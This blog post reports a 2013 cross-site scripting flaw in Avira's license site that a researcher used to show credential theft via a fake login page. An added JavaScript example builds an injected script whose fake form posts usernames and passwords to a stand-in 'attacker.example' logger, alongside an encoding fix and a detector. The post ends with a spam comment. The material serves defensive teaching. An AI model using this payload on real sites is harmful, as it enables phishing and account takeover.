
Thursday, April 18, 2013

Minor flaw allows Hacker to hijack Avira Antivirus customers accounts

Cross-site scripting vulnerabilities are often mistakenly dismissed as unimportant, yet they let an attacker inject client-side script into web pages viewed by victims, where it runs with the trust and privileges of the legitimate site...

A cross-site scripting (XSS) vulnerability can be exploited to bypass access controls such as the same-origin policy, because the injected script executes in the context of the trusted site rather than the attacker's.

Ebrahim Hegazy (Zigoo), an Egyptian information security advisor, found an XSS vulnerability in the Avira license daemon.

Instead of exploiting it in the usual proof-of-concept way (an "alert('MyName')" pop-up) and then reporting it, he decided to demonstrate it to the Avira security team differently, with the aim of showing how an XSS vulnerability lets an attacker steal user accounts, with the credentials captured in clear text.

To demonstrate the attack he created four files:
  • avira.html - the fake login page
  • log.php - the logger, which writes the submitted credentials in clear text to a text file
  • avira.txt - the file in which the captured credentials end up
  • done.html - shows a congratulations message to fool the user
The video below explains the attack methodology:
According to Ebrahim Hegazy, the Avira team responded promptly and fixed the flaw in a short time. Those who still consider XSS a low-severity vulnerability may now want to revise that opinion.
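The following is an added example, not Avira's code and not Hegazy's four files: a minimal model of a reflected XSS in which a request parameter is rendered into HTML without encoding, the kind of phishing payload such a flaw lets an attacker inject (a fake login form posting credentials in clear text to an attacker-hosted logger, then forwarding the victim to a reassuring "done" page), and the hardened renderer that neutralises it. The parameter name, the `attacker.example` URLs and the page layout are assumptions for illustration only.

```javascript
// Added example (not the Avira code and not the original post's files).
// Models the XSS-to-phishing chain described above and the fix for it.

// Contextual output encoding for HTML text and attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable server-side template: the request value lands in the page verbatim.
// (Hypothetical page; the real flaw is not reproduced here.)
function renderVulnerable(name) {
  return `<html><body><h1>License status for ${name}</h1></body></html>`;
}

// Hardened template: the same value, HTML-encoded before interpolation.
function renderHardened(name) {
  return `<html><body><h1>License status for ${escapeHtml(name)}</h1></body></html>`;
}

// The kind of payload the post describes: replace the trusted page with a fake
// login form (avira.html) whose action is an attacker-hosted logger (log.php)
// and which carries the victim on to a "done" page afterwards. Because the
// script runs on the vendor's own origin, the address bar and TLS padlock look
// legitimate to the victim. Both URLs are hypothetical.
function phishingPayload(loggerUrl, doneUrl) {
  const fakeForm =
    '<form method="POST" action="' + loggerUrl + '">' +
    "<h2>Session expired, please sign in again</h2>" +
    '<input name="user" placeholder="E-mail">' +
    '<input name="pass" type="password" placeholder="Password">' +
    '<input type="hidden" name="next" value="' + doneUrl + '">' +
    "<button>Sign in</button></form>";
  // JSON.stringify yields a valid JS string literal for the injected script.
  return "<script>document.body.innerHTML=" + JSON.stringify(fakeForm) + ";</script>";
}

// Does the rendered page contain a script element the template did not put there?
function hasInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Run the payload through both renderers; only the vulnerable one executes it.
function demo() {
  const payload = phishingPayload(
    "https://attacker.example/log.php",   // hypothetical credential logger
    "https://attacker.example/done.html"  // hypothetical "congratulations" page
  );
  return {
    vulnerable: hasInjectedScript(renderVulnerable(payload)), // true
    hardened: hasInjectedScript(renderHardened(payload)),     // false
  };
}
```

Output encoding at the point of interpolation is the primary fix; a Content-Security-Policy that disallows inline script and a `form-action` directive limited to the site's own origin would additionally stop the injected form from posting credentials elsewhere even if an encoding bug slipped through.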

1 comment:

  1. Howdy! I'm at work browsing your blog from my new apple iphone!
    Just wanted to say I love reading your blog and look forward to all your
    posts! Carry on the fantastic work!

    Feel free to visit my blog post ... dragon city hack